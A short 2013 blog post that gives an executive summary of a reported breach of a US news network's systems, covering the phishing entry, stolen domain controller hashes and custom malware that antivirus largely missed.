Irregular Expressions

Jan 30 2013   11:41PM GMT

Information Regarding A Significant Foreign Breach In To A US News Network

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

This is a good highlight on if someone gets in to your network and has a specific target it can be infuriatingly difficult to remove them.

With the amount of access that was gained significant damage could have been done to their internal infrastructure. Instead they had specific targets in mind. The information in the article is very good, but I can give the executive version.

1) Access was gained to the network through a suspected phishing attack.
2) A foothold was gained on at least three computers.
3) Hashes were stolen from the domain controller. (The way that this is worded it sounds like they stole every single hash, and that it very possible)
4) A rainbow table was most likely used to crack the hashes and gain access to those accounts.
5) Routines were setup to search for documents and mail associated with specific users.
6) 45 pieces of custom Malware was installed during the time on the network. Of these only a single sample was detected by their AV vendor Symantec. I don’t think you should take this as a total negative against Symantec. The attackers would have know that it was the AV being used and would have crafted their tools to avoid detection by it.

 Comment on this Post

There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to:

Share this item with your network: